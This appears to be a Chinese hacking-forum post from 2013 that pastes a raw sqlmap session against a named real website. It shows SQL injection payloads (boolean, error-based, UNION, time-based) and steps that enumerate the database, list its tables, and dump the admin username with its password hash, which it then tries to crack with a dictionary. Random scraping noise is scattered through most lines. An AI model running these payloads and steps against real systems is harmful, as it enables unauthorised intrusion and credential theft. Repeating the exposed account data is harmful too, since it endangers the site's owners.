找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2432|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
. e8 a2 L" A9 v4 |, o5 Tms "Mysql" --current-user       /*  注解:获取当前用户名称
+ Y, z& o( g- x; G! B+ l7 b    sqlmap/0.9 - automatic SQL injection and database takeover tool0 v9 J* x9 M) L
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54! h( o  s' I) I2 j9 k
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) j' \( N) b  k; X' a0 V
    session file. _' k$ I0 ^) T2 V4 q0 p; o; t
    [16:53:54] [INFO] resuming injection data from session file
    : a6 B9 p8 M7 Y! F[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; n: m& z/ G9 v* X3 ]
    [16:53:54] [INFO] testing connection to the target url
    ' O% u5 F$ K. A  Zsqlmap identified the following injection points with a total of 0 HTTP(s) reque! q, m7 m& ~" |" z  ]" Y
    sts:
    ' _* x0 {, N( @---
    * D+ r+ i# `0 ~+ D. K, [Place: GET
    0 G- t( F- m% T) k: HParameter: id
    8 |2 E2 j/ |8 q$ i    Type: boolean-based blind
    - H0 Y) }% B$ A6 w1 T0 }: X  j: n    Title: AND boolean-based blind - WHERE or HAVING clause! L6 S0 n1 e1 P& n5 S7 {, k
        Payload: id=276 AND 799=799" Q/ u. D: T" y0 H, \& e. T5 u
        Type: error-based
    ) Z, w6 z$ \1 f+ \( H0 N    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. C- }+ @4 X3 p% T3 k
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 V6 L8 t7 u/ L- L- Q) n6 ~  v
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    + e( L9 }+ u, Q. \; P),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' ~$ c: V7 B) a& E0 G1 f5 V
        Type: UNION query
    4 N5 F. e+ z0 P8 K& \4 P8 ~    Title: MySQL UNION query (NULL) - 1 to 10 columns$ v( Q4 [8 y3 D$ U6 k6 [7 \4 I
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    + W% b  |" y5 @9 |" k( [(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* @. p( I- r* P+ h8 p
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    & m: C3 `" T: Q. R- f    Type: AND/OR time-based blind' b6 q4 k" `. V; R0 j" e% u
        Title: MySQL > 5.0.11 AND time-based blind- o) o; I0 o  _& |# B- L
        Payload: id=276 AND SLEEP(5)( k6 L) O% R$ j9 l% Z# F
    ---
    1 S: T( `. D4 f$ ?[16:53:55] [INFO] the back-end DBMS is MySQL
    ) m4 f2 _  K$ X) g  z8 C, bweb server operating system: Windows
    3 F( e4 u3 _7 P- x! T4 F* zweb application technology: Apache 2.2.11, PHP 5.3.0+ q7 Y) \# X( v6 n) L" f
    back-end DBMS: MySQL 5.0( `# W* V  H* `
    [16:53:55] [INFO] fetching current user. {- q- g% w" O! g: o* _
    current user:    'root@localhost'   / |! O1 e6 k+ E! S( h
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
      u7 ^7 o2 f9 P3 L, I$ ptput\www.wepost.com.hk'
  • shutting down at: 16:53:581 o% r3 _: ~- x' O7 _

    : j: W% Z9 E. H! V' Y! e  E3 V5 q2 TD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. q! o+ {; x% \
    ms "Mysql" --current-db                  /*当前数据库( z, j  ^% K4 q7 d! A7 `- B+ g/ J
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    9 g, K# Y: A& e    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    2 f/ R4 {6 @% }9 F& L& W( \[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# W5 ~% ?- r* e. }
    session file, s0 ^" ], C3 ~% r0 @
    [16:54:16] [INFO] resuming injection data from session file
    ; @' }4 h8 W6 Y% ]' P[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) n0 n: ?* k% n( f) ~8 X
    [16:54:16] [INFO] testing connection to the target url
      q/ f4 B1 q/ x) `7 Msqlmap identified the following injection points with a total of 0 HTTP(s) reque( O) K6 H8 z1 `4 T2 c
    sts:2 M) O/ S* U2 R6 N% r
    ---5 X& }9 }$ J2 T% Z
    Place: GET$ U* i5 v7 \9 o. E+ X
    Parameter: id* e) A+ s" d2 I# C9 t! o
        Type: boolean-based blind
    - o1 H5 w, n1 L: \( ]    Title: AND boolean-based blind - WHERE or HAVING clause
    5 I" P1 t1 m1 o! ?2 o6 S! {    Payload: id=276 AND 799=7992 G7 @2 k6 R3 l2 ]! W; I1 {
        Type: error-based; a" i" }& f$ N) b" c
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ( V: {' |* L, [0 f    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,. ?8 v4 N  [6 Y2 J
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! V) ]6 Z" N9 ~& x
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) r9 h- B: F% o
        Type: UNION query
    : A7 d: V( t7 q1 B    Title: MySQL UNION query (NULL) - 1 to 10 columns' E7 ^0 ^; k1 Q+ a2 H; \
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    % X# c% V* `# J- t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% B$ _  r9 w1 |6 `
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ! L. O- @% _* g' m    Type: AND/OR time-based blind% \: Y+ l5 q* O5 Z: a/ B
        Title: MySQL > 5.0.11 AND time-based blind
    : O- k  M7 E8 X9 G. f# X/ K    Payload: id=276 AND SLEEP(5)
    ! h! O; ~/ s# \. f0 F* A& C1 A---
    3 b' t/ A& _) p[16:54:17] [INFO] the back-end DBMS is MySQL
    , e; w/ M1 Z% `) X; |6 b) N- e* v0 {web server operating system: Windows
    ; b0 s2 X3 g! C; R- Bweb application technology: Apache 2.2.11, PHP 5.3.0
    ! V* f1 W7 Z+ B8 U3 O8 Sback-end DBMS: MySQL 5.0, H  }5 P1 y, d0 @/ c
    [16:54:17] [INFO] fetching current database$ M. m& L# t0 M% E+ `; C
    current database:    'wepost'$ m# n% s8 j- t7 D1 V0 j5 k
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    0 a0 X; c8 v' i4 d  }0 ctput\www.wepost.com.hk'
  • shutting down at: 16:54:18! V- N# A6 N( p
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    % r& ?5 h6 @$ F& gms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名1 F6 v8 y; W, k  M( ^* l
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    # g! \9 I' ^. V1 e: y    http://sqlmap.sourceforge.net
  • starting at: 16:55:255 O$ e  S% ]7 y6 E% T! H: Z& K1 q! W1 I
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as. i& e* s5 i0 ^& ^( Y! ~
    session file
    8 `9 {4 }2 c- ^7 d: ~[16:55:25] [INFO] resuming injection data from session file$ B, |8 Y( R5 W1 S. ~
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    $ q% W" H- e# O5 R[16:55:25] [INFO] testing connection to the target url
      i, Y4 J9 q- b, |; R- l+ Isqlmap identified the following injection points with a total of 0 HTTP(s) reque" Q2 ]) K5 x- ]- X- |1 [
    sts:8 M. d2 f  h$ i$ t* A# _6 y- a
    ---
    7 h% a& }% O& n7 E  c" TPlace: GET1 l, C* Q, z2 [; A! h3 m
    Parameter: id
    7 F5 u$ }- a1 _$ g/ p    Type: boolean-based blind
    6 L3 Y/ z! r# u5 b, d2 W2 Y2 `    Title: AND boolean-based blind - WHERE or HAVING clause- _8 X8 U1 d7 J# X: }- o
        Payload: id=276 AND 799=799
    * a; K" p# T4 K2 ^: C7 L7 z4 ]4 Y    Type: error-based1 c7 J0 a9 l: f! f+ d
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    7 I+ L, y: ?9 U8 O- M* M7 }    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 w' w* K$ M- K/ k# _9 x
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* ?8 D7 ^, p7 N
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 O' w( r0 @4 q2 c& M    Type: UNION query
    ! W+ n; j" Z% \! l  ?    Title: MySQL UNION query (NULL) - 1 to 10 columns6 w1 O* }/ n, q& Q  X7 j6 G1 F
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    " F5 V; i$ O, `5 ~; H' Z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ; q! m+ w/ j8 Z" _CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#' S9 }" f$ H# s2 N, ~: x& C
        Type: AND/OR time-based blind
    ( a6 S+ r9 ^, `& r7 u3 Y+ j3 z    Title: MySQL > 5.0.11 AND time-based blind- @7 Z& H  K2 |! t
        Payload: id=276 AND SLEEP(5)
    2 N" D# d4 |8 L* E3 f---
    . m8 N: L6 v# w/ }: E+ |9 a[16:55:26] [INFO] the back-end DBMS is MySQL# b* J+ C, f$ F' h! d
    web server operating system: Windows
    / j# K6 l6 {& Tweb application technology: Apache 2.2.11, PHP 5.3.0) U6 y0 h. l" c9 _% w* S
    back-end DBMS: MySQL 5.0+ [# ^8 w( T- v5 D; u* N* Z8 z
    [16:55:26] [INFO] fetching tables for database 'wepost': c+ v6 F3 W+ r8 f7 ^, _! V
    [16:55:27] [INFO] the SQL query used returns 6 entries
      d2 l2 n' M1 N: g/ p% _; m  Q0 }* UDatabase: wepost1 e% [( \" I6 y; B) y
    [6 tables]
    ) F+ A6 a+ s, i4 {( p/ f; A+-------------+6 ]% v; U- o5 Z" u' X
    | admin       |
    4 r- P, m" U- l# ^5 ?6 N) t| article     |( a/ {) w, u0 d9 N" I# q& m. `6 E
    | contributor |3 \. K- F9 n8 u% L& |& [% E- z
    | idea        |3 K5 m) l  z5 U6 F3 f+ I/ \
    | image       |4 f, ~- K: J# [8 h$ W
    | issue       |
    1 q7 b$ @# L4 ~6 K# Y5 H5 @3 ]) E+-------------+
    6 }1 K; [) X' Y[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; T% R  t! J8 E! V4 `3 _) d
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    4 `( Q. R4 \5 A5 U. s3 n
    2 Z6 v$ x& o% E% J+ S3 x; Z. o' xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 {  U" h3 A1 M; T% p1 v  f. j
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名( F. f1 N2 T* @* _
        sqlmap/0.9 - automatic SQL injection and database takeover tool, I* a. c/ A  k- n0 G  [
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    2 Z( O6 z8 [& }$ u0 P/ Tsqlmap identified the following injection points with a total of 0 HTTP(s) reque+ f8 Q0 t6 }9 x% X8 o& W; V0 o. z
    sts:
    8 `# V) O" D% G8 C9 d---
    - I9 \. A5 I9 X5 ?1 `Place: GET7 y$ X3 n7 {* r8 \- A1 K0 y. l
    Parameter: id! [1 z# M) f. @( r
        Type: boolean-based blind: }5 W3 B  e! H; z, n' l8 B+ g( j
        Title: AND boolean-based blind - WHERE or HAVING clause0 L6 R9 e* w3 f% a" i
        Payload: id=276 AND 799=799
    ' j  c$ K+ b' N" h! M, g: ]. W    Type: error-based# g! m) r0 \) ~! L( N4 }3 `( f& S1 A
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    / w, l; P) a  ?( f, w    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 y. O, S! p+ ^  N120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    # x6 W1 n) }. Q" P: p; T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! n( P9 V7 F' Q: `
        Type: UNION query. o8 E; [7 t  b$ h' h) P& k/ i
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    , X/ z# U' m* j  _    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    $ z' h  Q' a0 C2 f7 c4 V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 g5 u2 d+ ?' h! e2 ]0 `
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 l) f# c. N1 T0 q
        Type: AND/OR time-based blind
    ; h1 U  W; x7 z; [    Title: MySQL > 5.0.11 AND time-based blind# U7 |/ K6 N" m$ G  i( c5 {; s& y+ g
        Payload: id=276 AND SLEEP(5)" w4 y4 N7 d+ _* c1 E! P
    ---
    3 ]; {4 v* @" O3 H2 x/ Yweb server operating system: Windows
    6 r$ a$ y) p# ~; ]" p  t) _) Mweb application technology: Apache 2.2.11, PHP 5.3.0
    7 K5 p0 o$ F2 e/ d7 c9 _# jback-end DBMS: MySQL 5.0
    9 P9 p8 \6 [: D0 v[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se  V7 R: S" @: D7 Z% j
    ssion': wepost, wepost
    ; ?" ~) y: X# CDatabase: wepost
    , Y) q  w2 G9 y* JTable: admin4 G* n6 u+ J) O8 N1 K1 j) H
    [4 columns]
      Q& i; S) `$ M3 j" x" t+----------+-------------+# t+ ~2 T8 a8 K' b
    | Column   | Type        |
    ( L8 B0 I, Q5 z# B, j: C3 d+----------+-------------+
    ) W2 l( N8 F  F! d+ R: T| id       | int(11)     |
    ! r; W6 H/ M# A6 b| password | varchar(32) |7 g, R8 T- O8 }4 y
    | type     | varchar(10) |
    ; S3 H1 M- {: y$ B0 s& U5 M* J| userid   | varchar(20) |  x' \$ i0 ^  W! ^. c' _
    +----------+-------------+$ X9 p; K  c8 X
  • shutting down at: 16:56:19
    8 {! n# |+ K" T# u3 g( h; z
    , G3 R1 z" _! p) yD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 Q' J: @2 G. h/ D+ }' J( i  T9 [$ x7 z
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    3 P$ a' M, s' Q% r' M2 x    sqlmap/0.9 - automatic SQL injection and database takeover tool) K- F# t, Z& C. x! E5 E0 i. ?
        http://sqlmap.sourceforge.net
  • starting at: 16:57:149 B5 n+ P# h4 c% ]! R0 d/ {2 ?
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    9 L$ n, X- G. ]' csts:
    ) @) M) o/ N7 c' l) T. |---
    - E/ w" |5 a' Z+ ~, {  k- A0 NPlace: GET
    3 I- G; e! E0 E* f% B2 U" ^Parameter: id4 d- s1 B4 G/ U; E6 r
        Type: boolean-based blind
    4 |: A1 J& i. f- v0 e1 \    Title: AND boolean-based blind - WHERE or HAVING clause4 A" o& P& e2 P
        Payload: id=276 AND 799=7998 j+ Q- e1 @0 l1 O
        Type: error-based
    * n1 P8 Y+ e/ v4 K* u# _    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ( T2 \& J8 z4 I1 q    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 v. P# f! f0 o  }# K" ?120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' F, ~+ u1 I/ J2 M0 G
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
      U* x/ l* l' A% l+ q: A( `    Type: UNION query
    & m. f, J* R7 q; R& ?    Title: MySQL UNION query (NULL) - 1 to 10 columns, ^. O! }& L- e( ?8 v4 x* B
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: E4 ^- E, s4 Z
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    3 Q3 U4 B2 r0 g2 ]. j: `2 pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 U+ G1 X$ m; d3 L
        Type: AND/OR time-based blind; O9 f, T# K5 }
        Title: MySQL > 5.0.11 AND time-based blind( C" h1 b* p% \8 D1 _  H- X
        Payload: id=276 AND SLEEP(5)
    ' b& u( ?3 b3 l# D  }6 u---& s3 M: h$ e7 E! k, u# k) o! `! Y
    web server operating system: Windows" Z3 T% e) h( E2 k
    web application technology: Apache 2.2.11, PHP 5.3.0
    " S9 g3 P9 h$ T( P; W* X1 P5 bback-end DBMS: MySQL 5.0
    6 \! m. d) @8 I# _& [recognized possible password hash values. do you want to use dictionary attack o5 j8 S$ d; y. o7 j+ r/ b- I0 h
    n retrieved table items? [Y/n/q] y
    $ U( H; S4 z9 B6 |1 Jwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    $ j5 I1 A3 Q% Ido you want to use common password suffixes? (slow!) [y/N] y/ \8 Y! U2 ^  }4 p, v5 E* W
    Database: wepost7 O% P) w1 x7 ~3 X9 O' ]& n6 E
    Table: admin
    * j$ [% [$ P+ `, q  x; ~4 O1 M/ o: m; `[1 entry]8 j2 S+ f+ u% {9 q
    +----------------------------------+------------+
    ; t* @; M. Y/ D# C7 {| password                         | userid     |3 U; s0 _( y( W% S0 I
    +----------------------------------+------------+  l# g( F9 g: S1 r
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    7 f+ t9 f+ D, I" y! H+----------------------------------+------------+
    8 P; K% C! e( Y( ^8 m( H
  • shutting down at: 16:58:14* E, V; y3 W) O: b" p

    & K5 u8 L6 M" l7 W& ]  FD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表